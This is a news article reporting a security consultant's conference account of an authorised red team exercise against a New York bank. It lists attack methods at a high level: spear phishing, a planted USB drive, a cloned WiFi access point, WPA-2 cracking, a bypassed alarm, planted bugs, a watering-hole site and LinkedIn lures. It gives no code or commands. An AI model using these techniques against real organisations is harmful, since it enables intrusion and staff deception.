Red teaming is a relatively new type of extended pen testing used to raise the security and governance bar in major corporates, most notably financial service organisations such as banks.
The vast majority of financial services organisations do not reveal the results of their red team exercises, due to the political sensitivity that is involved - so SCMagazineUK.com was keen to hear what Dan Soloman, head of cyber risk and security services with Optimal Risk Management had to say about a red team exercise he and his staff recently carried out against a major New York bank.
In a presentation at Counter Terror Expo this week Soloman explained that the main objective of a red team exercise is to stage a series of controlled attacks against the organisation concerned, to discuss the failures in all aspects of physical and electronic security, and prepare the business for a real world cyber attack.
"In the New York bank exercise, we looked at several areas, including how APTs work in the real world, the human attack issue and, of course, pen testing. We test attacked all of the banks Web, client ad mobile applications," he said.
On the human attack front Soloman and his team staged spear phishing attacks, as well as APTs and custom malware launches, DDoS attacks, and mobile device application tests.
War gaming
Next came the war game aspect, which involves physical infiltration, as well as Web access and WiFi network analysis plus interrogation.
A USB drive was planted in the banks comms room, and the team gained successful access to the businesses WiFi antenna - a step that could be `game over' for many organisations, especially since the team also successfully cloned the bank's WiFi, getting staff to log into the rogue access point.
"It was interesting that the bank had a silent alarm on its IT facilities, but we bypassed this, as our red team was in - and out - in under three minutes," he said, adding that this was not before they were able to plant a series of bugs and monitor staff Skype conversations.
Soloman also made the interesting claim that his team were able to crack the bank's WiFi password - encrypted to WPA-2 standards - in about four-and-a-half hours, a process that they repeated at second bank site, so proving the methodology.
"This is also allowed us to carry out a waterhole attack using a fake Web page," he said, adding that the process of inserting malware via the fake Web site is a relatively easy step to take.
Another avenue of successfully staging attacks against staff email accounts was the generation of personal emails to staff, offering them a reward in return for referrals to colleagues.
LinkedIn, he says, was also useful in this regard, as it allows the red team to gain information on the staff before launching personalised messages offering staff a US $50 (£30) reward for referring friends on LinkedIn.
